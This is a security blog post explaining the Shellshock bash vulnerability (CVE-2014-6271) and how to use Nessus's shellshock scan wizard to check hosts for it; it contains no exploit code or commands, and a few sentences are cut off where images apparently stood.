Shellshock Vulnerability Scanning – Nessus

Nessus, the most popular vulnerability
scanner that scan the IT infrastructure to find the possible
vulnerabilities in the network. Nessus can also be integrated with
Nmap and metasploit, the integration result a finest tool that can
perform vulnerability scanning + exploitation = a complete
penetration testing environment. OpenVAS is the competitor of nessus
and both tools have their own merits and demerits, but at this time;
the objective is to make Unix/MAC operating systems secure from the

What Is ShellShock Bug ? 


ShellShock, a vulnerability bigger than
HeartBleed Bug; it is affecting Linux and Mac OS X software. Dubbed
Shellshock, or the Bash Bug, the security vulnerability is officially
known as CVE-2014-6271 and affects the Bash command processor which
is used in most Linux distributions, in Apple’s Mac OS X, and the
Apache web server software, among others. 
Users running Linux and Mac OS X on
their PCs are at risk, but it is thought that the most likely target
will be web servers running the Apache web server software. 

How to scan for the “shellshock”
vulnerability ? 


ShellShock is in bash, but can be
exploited remotely in a number of ways (via HTTP or other means).
Tenable has released a handful of plugins to do patch checks, to test
the vulnerability via SSH via an authenticated scan, and to test for
the vulnerability via HTTP(s). In order to speed up the audit, we’ve
released a wizard for this. 
To use it, update your plugin feed
(makes sure you’re running the plugin set 201409251325 or newer. Then
go to Policies -> Create a new policy, and you’ll notice the new
shellshock wizard:

Click on it and follow the
instructions. You’ll have the option to enter your SSH credentials,
but you can just as well perform a fully unauthenticated scan to only
target HTTP. Once this is set, create a new scan and use this policy.
Hopefully, you will not see an output such as:

What does this wizard do? 


This wizard creates a very narrow scan
policy that will perform a quick port scan (or slower, if you ask for
a “thorough” scan) to identify the remote HTTP and SSH
servers. Then, it will: 
  • Log into every host (if you provided
    credentials) and will make sure that the vendor-supplied patches are
    installed ;
  • For good measure, it will also use
    the opportunity of being logged in to directly check bash itself, so
    that if your vendor did not provide patches, or if you’re scanning an
    unsupported system, Nessus will still catch the flaw ;
  • If a web server is running, Nessus
    will crawl it while setting a malformed User-Agent, Cookie and
    Referer field to try to exploit the vulnerability using this attack
    vector ;


Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

How to Install Kali Linux on VirtualBox [Windows Host] in 2020

Kali Linux is a Debian based Linux distribution, released on the 13th March 2013 as a complete rebuild of BackTrack Linux. It is one of...

Acunetix v13 Release Introduces Groundbreaking Innovations

The newest release of the Acunetix Web Vulnerability Scanner further improves performance and premieres best-of-breed technologies London, United Kingdom – February 5, 2019 – Acunetix,...

What is Ethical Hacking, how to be an Ethical Hacker

Hacking is the process of discovering vulnerabilities in a system and using these found vulnerabilities by gaining unauthorized access into the system to perform...

Basic steps to ensure security Online!

Security concerns are growing day by day due to the growing interconnectivity and technology. Drastic things can happen if you be a little careless...